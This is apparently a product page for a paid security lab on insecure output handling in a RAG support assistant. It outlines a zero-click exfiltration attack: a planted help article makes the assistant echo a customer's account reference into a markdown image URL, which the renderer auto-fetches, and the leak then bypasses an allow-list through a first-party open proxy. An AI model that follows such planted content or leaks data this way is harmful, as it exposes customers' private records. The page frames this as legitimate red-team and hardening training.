Insecure Output Handling: Zero-Click Exfiltration Through Rendered Model Output (EchoLeak)
Treat the model as an untrusted source whose output flows into a sink: the chat client's markdown renderer. Prove the renderer auto-fetches, plant a document so a benign account question makes the assistant echo a customer's own account reference into a markdown image URL, and watch the renderer auto-fetch it (zero-click exfil, the EchoLeak channel). Measure its attack-success-rate, defeat a CSP-style allow-list through a first-party open proxy, measure that bypass too, then harden in two moves: close the render sink so untrusted output never fires an outbound request, add an audited host allow-list the open proxy cannot defeat, and re-run both attacks to watch ASR fall to zero.
Hands-on labs require Pro · $29.99/mo · cancel anytime
What you'll learn
- 1Recon: prove the renderer auto-fetchesYou are red-teaming DV-RAG-Support, ACME Cloud's customer-support assistant. A
- 2Pixel exfil: zero-click leak through the rendererNow turn the renderer into an exfil channel. The model is never asked to leak a
- 3Measure: attack-success-rate of the pixel exfilOne lucky exfil is a demo. A finding needs an attack-success-rate (ASR): how often
- 4CSP bypass: defeat the allow-list through a first-party open proxyThe blue team shipped a CSP-style fix: the renderer now trusts exactly one image
- 5Measure: attack-success-rate of the CSP bypassYou proved the open-proxy bypass works once. A finding needs the same treatment the
- 6Harden the sink: no outbound on untrusted outputSwitch hats. You proved the direct-pixel exfil, measured it, bypassed a CSP-style
- 7Harden the allow-list: an audited host list the open proxy cannot defeatThe sink no longer fetches attacker query params, so both exploits are dead today. But
- 8Verify: re-run both attacks, ASR drops to zeroA fix you did not re-measure is a hope. You measured two attacks earlier: the
Prerequisites
- Comfortable reading Python
- Know what an HTTP GET and a markdown image are
- No ML background required
Exam domains covered
Skills & technologies you'll practice
This advanced-level ai/ml lab gives you real-world reps across:
What you'll do in this lab
This is a hands-on offensive-security lab about insecure output handling (OWASP LLM05). You attack DV-RAG-Support, a working Retrieval-Augmented Generation assistant, by treating its output as somebody else's input. The chat client renders the model's answer as markdown, and a markdown image is an outbound HTTP request. You plant one help article so that a customer's ordinary account question makes the assistant echo the customer's own account reference into an image URL, and the renderer auto-fetches it. The record exfiltrates with zero clicks, the same channel behind EchoLeak, the first real-world zero-click exploit against a production LLM system.
You then defeat a CSP-style allow-list the way EchoLeak's authors did: by routing the exfil through a first-party open proxy that the allow-list trusts, proving an allow-list is only as strong as its most open member. You measure how reliably the channel fires across realistic account questions, then switch hats and close the sink on the sink side: an audited egress allow-list that refuses open-proxy members, a renderer that never forwards attacker query parameters, and a safe-markdown subset that drops raw HTML and dangerous URI schemes. The lesson is that the bug was never that the model said something bad; it was that the app passed model output to an interpreter unsanitized.